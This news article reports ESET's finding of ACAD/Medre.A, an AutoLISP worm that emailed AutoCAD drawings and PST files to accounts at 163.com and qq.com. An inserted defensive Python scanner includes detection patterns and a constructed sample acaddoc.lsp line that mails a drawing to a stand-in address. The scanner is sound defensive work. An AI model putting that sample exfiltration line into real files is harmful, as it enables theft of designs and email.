Researchers at ESET have uncovered a new worm that is stealing AutoCAD drawings and designs, and shipping them off to an email account that appears to be in China. Given the hype around Stuxnet and other focused code, the appearance of this worm took ESET researchers by surprise.
The malware itself is written in AutoLISP, the scripting language used by AutoCAD. Over the last two months, the worm – called ACAD/Medre.A – has remained focused on Latin America, most notably Peru.
ESET is reporting an unusually high number of infections (over 10,000), and suggests that this might be explained by the fact that malware disguised as AutoCAD files may have been distributed to companies that were conducting business with public services in Peru.
Researchers say that the malware is targeting versions 14.0 to 19.2 of AutoCAD, and that the author of the worm assumes it will also work in future releases of the software.
“After some configuration, ACAD/Medre.A will begin sending the different AutoCAD drawings that are opened by e-mail to a recipient with an e-mail account at the Chinese 163.com. It will try to do this using 22 other accounts at 163.com and 21 accounts at qq.com, another Chinese internet provider,” explained Righard Zwienenberg, of ESET’s malware research team, on a company blog.
In addition to AutoCAD drawings, the malware also targets PST files (email) and will attempt to copy those as well.
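As an added example (not part of the article or of ESET's analysis), here is a defender's triage scan over AutoLISP files for the indicators the article names: mailboxes at 163.com or qq.com, and mail-sending code next to .dwg or .pst handling. The regexes, the scoring weights, the sample files, and the assumption that AutoCAD auto-loads acad.lsp and acaddoc.lsp from the drawing folder are mine, not taken from the article.

```python
import os
import re
import tempfile

# Indicators taken from the article: drawings mailed to accounts at 163.com and
# qq.com, interest in .dwg drawings and .pst mail archives, code in AutoLISP.
INDICATORS = {
    "exfil_domain": re.compile(r"@(?:163|qq)\.com\b", re.IGNORECASE),
    "mail_send": re.compile(r"\b(?:smtp|sendmail|mailto)\b", re.IGNORECASE),
    "pst_access": re.compile(r"\.pst\b", re.IGNORECASE),
    "dwg_access": re.compile(r"\.dwg\b", re.IGNORECASE),
}
# Assumption: AutoCAD auto-loads scripts with these names from the drawing folder.
AUTOLOAD_NAMES = ("acad.lsp", "acaddoc.lsp")

def score_text(text, filename):
    """Return (hits, score) for one AutoLISP source file; hits maps indicator -> count."""
    hits = {name: len(rx.findall(text)) for name, rx in INDICATORS.items() if rx.search(text)}
    score = 0
    if "exfil_domain" in hits:
        score += 3          # mailbox at a domain named in the report
    if "mail_send" in hits and ("dwg_access" in hits or "pst_access" in hits):
        score += 2          # mail-sending code next to drawing/PST handling
    if filename.lower() in AUTOLOAD_NAMES:
        score += 1          # runs without the user explicitly loading it
    return hits, score

def scan_tree(root, threshold=3):
    """Walk root, score every .lsp file, return (path, hits, score) at or above threshold."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".lsp"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits, score = score_text(fh.read(), name)
            if score >= threshold:
                findings.append((path, hits, score))
    return sorted(findings, key=lambda f: f[2], reverse=True)

def demo():
    """Build a constructed sample tree (not real malware) and scan it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "acaddoc.lsp"), "w") as fh:  # constructed, suspicious
        fh.write('(setq dest "drop@163.com")\n(sendmail dest (strcat (getvar "DWGNAME") ".dwg"))\n')
    with open(os.path.join(root, "helpers.lsp"), "w") as fh:  # constructed, benign
        fh.write('(defun c:hello () (princ "hello from AutoLISP"))\n')
    return scan_tree(root)
```

Run `scan_tree()` against AutoCAD support paths and the folders where drawings are exchanged; a hit is a triage lead to inspect by hand, not proof of infection.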
According to Zwienenberg, the malware represents “a serious example of suspected industrial espionage.”
“Every new design created by a victim is sent automatically to the authors of this malware. Needless to say, this can cost the legitimate owner of the intellectual property a lot of money as the cybercriminals will have designs before they even go into production by the original designer. The attacker may even go so far as to get patents on the product before the inventor has registered it at the patent office.”
The email accounts used to store the stolen details were eventually closed, but not before the damage was done. It’s unknown if the code has spread to other areas.
